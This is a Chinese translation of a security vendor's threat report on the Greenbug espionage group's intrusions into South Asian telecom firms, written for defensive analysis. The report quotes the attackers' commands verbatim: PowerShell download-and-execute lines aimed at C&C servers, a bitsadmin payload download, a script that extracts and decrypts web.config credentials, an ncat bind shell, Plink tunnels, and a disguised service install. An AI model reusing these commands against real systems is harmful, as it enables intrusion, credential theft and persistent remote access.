Greenbug间谍组织正在对南亚的电信公司进行APT攻击，活动最早发生在2020年4月。

有迹象表明，至少有一家公司最早于2019年4月成为攻击目标。

电子邮件似乎是该组织使用的初始感染媒介。Greenbug在这些攻击中混合使用了现成的工具和开源技术。该组织似乎有兴趣获得对数据库服务器的访问权限；我们看到它窃取凭据，然后使用被窃取的凭据测试与这些服务器的连接。

据信，Greenbug可能来自伊朗。过去，有人猜测它与Shamoon组织有联系，该组织对沙特阿拉伯的组织进行了磁盘攻击。Shamoon攻击已被广泛涵盖，但[尚不清楚攻击者如何窃取凭据，使他们可以将破坏性恶意软件引入受害者系统。赛门铁克在2017年进行的研究发现了证据，表明Greenbug在涉及W32.Disttrack.B（Shamoon的恶意软件）的攻击之前已在组织的网络中。还未明确建立这种联系，但认为这两个组织之间的合作是可能的。

我们在这次攻击活动中看到的许多活动与过去从Greenbug中看到的活动是一致的，包括使用电子邮件作为初始感染媒介，使用公开可用的黑客工具（如Mimikatz和Plink）以及专注于收集凭据并在受害网络上维持访问的状态。

0x01 感染载荷

在多台受害机器上，通过Internet浏览器执行了一个名为proposal_pakistan110.chm：error.html的文件。我们还看到存档程序工具正在打开同一文件。尽管我们无法检索文件进行分析，但Greenbug早在2016年就利用了相同的技术。在这些较早的攻击中，电子邮件被发送到目标，其中包含指向可能受到感染的站点的链接，该站点托管了一个存档文件。该档案文件包含一个恶意的CHM文件（编译的HTML帮助文件），其中包括一个ADS以隐藏其payload，该文件在执行时已安装。此文件通常还包含诱饵PDF文件，其中包含错误消息，提示无法正确打开该文件。

我们还看到过去在其他组织中使用了类似名称的文件来删除Trojan.Ismdoor，这是Greenbug的自定义恶意软件。

在看到该文件的大约同一时间，还执行了一个名为GRUNTStager.hta的文件。赛门铁克认为，攻击者使用了可公开获得的后利用框架，以在其目标中初步立足。

 https://github.com/cobbr/Covenant/

Covenant是一个公开可用的黑客工具，被描述为“ .NET命令和控制框架，旨在突出.NET的攻击面，使进攻性.NET工具的使用更加轻松，并充当协作式命令和控制平台。 ” 它被描述为供“Red Team”使用，但也容易被恶意行为者滥用。

0x02 六个月的入侵

从2019年10月到2020年4月，Greenbug出现在一个组织的系统中。它似乎对获得对该组织的数据库服务器的访问感兴趣。观察到攻击者在受害者系统上执行了各种PowerShell命令。

第一个活动发生在2019年10月11日，当时执行了恶意的PowerShell命令以安装CobaltStrike Beacon模块以下载下一阶段的payload。

我们能够从PowerShell命令中提取两个命令和控制（C＆C）服务器地址。

最初，攻击者利用此访问权限执行PowerShell，以确定通过$ PSVersionTable安装的PowerShell版本。此后，我们发现攻击者继续尝试下载托管在先前提到的同一C＆C服务器上的恶意文件。

 PowerShell.exe -nop -w hidden -c $L=new-object net.webclient;$L.proxy=[Net.WebRequest]::GetSystemWebProxy();$L.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $L.downloadstring('http://95[.]179.177.157:445/0Zu5WpWN');

该命令已执行了几次，但不清楚攻击者是否成功。大约一个小时后，还观察到攻击者试图通过bitsadmin实用程序下载到CSIDL_APPDATA \ a8f4.exe。

 bitsadmin /transfer a8f4 http://95.179.177.157:8081/asdfd CSIDL_APPDATA\a8f4.exe

BITS管理实用程序可用于下载或上传要执行的作业。这是一个合法工具，我们会看到恶意行为者对其滥用，攻击者使用此工具将其他恶意工具下载到了受感染的计算机上。

不久之后，攻击者从CSIDL_SYSTEM86 \ [REDACTED]目录执行了一些工具：

然后看到攻击者正在启动PowerShell，并尝试执行名为msf.ps1的PowerShell脚本。

 PowerShell.exe -ExecutionPolicy Bypass -File CSIDL_SYSTEM_DRIVE\[REDACTED]\msf.ps1

该命令执行了几次，可能用于安装Metasploit payload以保留对受感染机器的访问。那是当天的最后一次活动。

直到2020年2月6日，当执行可疑的PowerShell命令时，才观察到进一步的活动。PowerShell命令遵循w3wp.exe进程的执行– w3wp.exe进程是用于向Web应用程序提供请求的应用程序。这可能表明攻击者已在受感染计算机上使用了Webshell。

以下是攻击者执行的PowerShell命令的副本：

 $ErrorActionPreference = 'SilentlyContinue';$path="C:\[REDACTED]\";Foreach ($file in (get-childitem $path -Filter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };if ($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\$tempdir -ItemType directory | out-null; copy-item $file.FullName $env:temp\$tempdir;$aspnet_regiis = (get-childitem $env:windir\microsoft.net\ -Filter aspnet_regiis.exe -recurse | select-object -last 1).FullName + ' -pdf ""connectionStrings"" ' + $env:temp + '\' + $tempdir;Invoke-Expression $aspnet_regiis; Try { $xml = [xml](get-content $env:temp\$tempdir\$file) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\$tempdir -recurse};Foreach ($_ in $connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host ""$file.Fullname --- $_.connectionString""} } };

此命令用于搜索类似于web.config的文件。对于找到的每个文件，它将在可能的情况下提取用户名和密码信息，并使用aspnet_regiis.exe实用工具对其进行解密。这些凭据可用于访问组织资源，例如SQL Server。

2月12日和2月14日看到了进一步的活动。2月12日，攻击者返回并执行了一个工具：pls.exe。一个小时后，攻击者使用netcat通过以下命令将cmd.exe绑定到侦听端口：

 CSIDL_SYSTEM_DRIVE\[REDACTED]\infopagesbackup\ncat.exe [REDACTED] 8989 -e cmd.exe

大约20分钟后再次发出相同的命令。

两天后，当地时间上午7.29，攻击者返回并连接到侦听端口，启动cmd.exe。

他们发出了以下命令：

第二天（2月15日），攻击者返回命令提示符，并发布了添加用户的命令，然后检查是否添加了该用户。直到3月4日，才在本地时间6.30pm启动PowerShell命令时才观察到进一步的活动。还观察到一个WMI命令正在执行，并用于搜索特定帐户。此后不久，从％USERPROFILE％\ documents \ x64执行了著名的凭据窃取工具Mimikatz。

3月11日，攻击者可能尝试使用PowerShell来连接到数据库服务器，大概是使用他们窃取的凭据。攻击者还使用SQL命令检索数据库服务器的版本信息，大概是为了测试凭据和连通性。

 PowerShell -C
 $conn=new-object System.Data.SqlClient.SQLConnection(" ""Data
 Source=[REDACTED];User [REDACTED] { $conn.Open(); }Catch { continue;
 }$cmd = new-object System.Data.SqlClient.SqlCommand(" ""select
 @@version;" "", $conn);$ds=New-Object
 system.Data.DataSet;$da=New-Object
 system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill($ds);$ds.Tables[0];$conn.Close();""

四月份看到进一步的活动。4月8日，观察到可疑的PowerShell命令试图从远程主机下载工具。

 PowerShell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://185.205.210.46:1003/iO0RBYy3O');
 PowerShell.exe -nop -w hidden -c $m=new-object net.webclient;$m.proxy=[Net.WebRequest]::GetSystemWebProxy();$m.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $m.downloadstring('http://185.205.210.46:1131/t8daWgy9j13');

那是4月8日看到的唯一活动，然后4月13日启动了PowerShell，并且观察到以下命令正在执行：

接下来，使用PowerShell将数据库连接到数据库服务器并检查版本信息，从而可能确认工作凭据。这与先前观察到的PowerShell命令类似，只是数据库服务器IP地址不同。

最后，攻击者使用PowerShell通过arp -a命令查看当前ARP表（最近与之通信的计算机的IP和主机名）。那是我们在这台机器上观察到的最后一个活动。

在此计算机上发现了许多可疑文件（请参阅IoC）。这些文件包括如前所述的Covenant工具和Mimikatz，以及可用于将shellcode加载到受害机器上的现成工具Cobalt Strike，以及多个webshell。

0x03 同一网络上的机器

我们在同一受害者网络上的各种机器上看到可疑活动。攻击者使用相同的文件proposal_pakistan110.chm：error.html将组织中的其他几个用户作为目标，该文件是由存档工具打开的，在某些情况下是通过Microsoft Edge浏览器打开的。之后，我们观察到在计算机上正在执行后门程序，以及从攻击者的基础结构下载到％APPDATA％目录的其他工具。

0x04 回传数据到攻击者

在该组织的一台计算机上，我们在12月9日看到了一些可疑的PowerShell命令。PowerShell执行的文件之一comms.exe是Plink。第二个类似的命令使用了Bitvise命令行隧道客户端。两种工具都用于建立通向攻击者控制的基础结构的隧道，以允许终端服务和RDP访问内部计算机。

 "CSIDL_COMMON_APPDATA\comms\comms.exe" apps.vvvnews.com -P  -l  -pw  -proxytype http_basic –proxyip [REDACTED] -proxyport 8080 -proxyuser [REDACTED].haq -proxypass [REDACTED] -C -R [REDACTED]:4015:[REDACTED]:1540
  
 
 "CSIDL_COMMON_APPDATA\comms\comms.exe" [REDACTED] -pw=[REDACTED] -s2c=[REDACTED] 1819 [REDACTED] 3389 -proxy=y -proxyType=HTTP -proxyServer=[REDACTED] -proxyPort=8080 -proxyUsername=[REDACTED]\[REDACTED].haq -proxyPassword=

诸如Plink和Bitvise之类的工具是合法的sysadmin工具，但之前曾被恶意行为者利用，包括今年早些时候的伊朗攻击者。

 https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/

在该组织的第二台计算机上还看到了Plink，该计算机似乎已从2019年11月到2020年4月受到威胁。该计算机上的第一个可疑活动是在11月13日看到的，当时在该计算机上启用了PowerShell Remoting以允许它接收PowerShell命令。

使用PowerShell命令从攻击者控制的基础结构中下载文件，并使用特定参数启动该文件。

 (New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yft.dat', 'C:\Programdata\VMware\Vmware.exe');
 start-process C:\Programdata\VMware\Vmware.exe -arg 'L3NlcnZlcj12c2llZ3J1LmNvbSAvaWQ9NDE=';

该参数解码为/server=vsiegru.com / id = 41。此后不久，便执行了Plink实用程序以建立与受害者网络的连接。然后执行第二个PowerShell命令，如下所示：

 Del -force C:\Programdata\Vmware\Vmware.exe;
 (New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yf.dat', 'C:\Programdata\Nt.dat');
 move C:\Programdata\Nt.dat C:\Programdata\Vmware\VMware.exe -force;
 cmd.exe /c sc create "VMwareUpdate" binpath= "C:\Programdata\Vmware\VMware.exe L3NlcnZlcj1rb3BpbGthb3J1a292LmNvbSAvaWQ9NDkgL3Byb3h5PXllcyAvcHJveHl1cmw…[REDACTED]…BUTUxcamF2ZWQubmFiaSAvcGFzc3dvcmQ9cHRtbEAyMjMz" displayname= "VMware Update Service" start= auto;
 start-service VMwareUpdate;
 Exit;

编码的参数解码为以下内容：

 /server=kopilkaorukov.com /id=49 /proxy=yes /proxyurl=http://[REDACTED]:8080 /credential=yes /username=[REDACTED]\[REDACTED] /password=[REDACTED]

然后看到攻击者在该计算机的管理员组中添加了一个用户。大约一周后的11月16日，又在该计算机上执行了另外两个PowerShell命令。

第一个解码为以下内容：

 iex ((New-Object Net.WebClient).DownloadString('http://apps[.]vvvnews.com:8080/Default.htt'))

由于攻击者已使用Plink工具建立了隧道，所有连接似乎都在路由到内部计算机IP地址。这样做可能是为了逃避检测。

0x05 针对电信行业的攻击

Greenbug在此活动中的活动似乎表明，这些受害者的主要重点是窃取凭据，并在受害者的网络上保持访问权限，以便攻击者可以在其上保持相当长的一段时间。这是我们过去在Greenbug受害者中看到的典型活动，保持受害者网络的持久性似乎是该组织的主要目标之一。在以前的攻击活动中，还观察到Greenbug是针对同一地区的电信公司的。

隧道的建立表明了保持低调对于这个群体而言是多么重要。它的重点是窃取凭据，并建立与数据库服务器的连接，这表明它旨在实现对受害者网络的高级别访问-这种访问如果被利用，可能会很快对受感染的网络造成破坏。如果参与者使用破坏性恶意软件或勒索软件加以利用，则这种访问级别可能会很快关闭组织的整个网络。

Greenbug的先前受害者包括航空，政府，投资和教育部门以及电信部门的组织，2017年袭击了中东的电信组织。2019年，我们观察到18个民族国家支持的针对全球电信行业。

也许很难理解为什么由电话提供商和互联网服务提供商（ISP）组成的电信行业对APT团体具有吸引力，而APT团体的主要动机通常是收集情报。电信公司对呼叫，通信日志和消息的访问使它们成为这些攻击者的宝贵目标。

我们只能推测Greenbug瞄准这些特定电信公司的动机，但是很明显，对受害网络的全面持久的访问仍然是该组织的主要目标。

0x06 保护措施

赛门铁克产品通过以下检测来防范此威胁：

· Trojan.Ismdoor

· Trojan.Ismdoor!gen1

· System Infected: Trojan.Ismdoor Activity

0x07 IoCs

本文翻译自：https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia如若转载，请注明原文地址：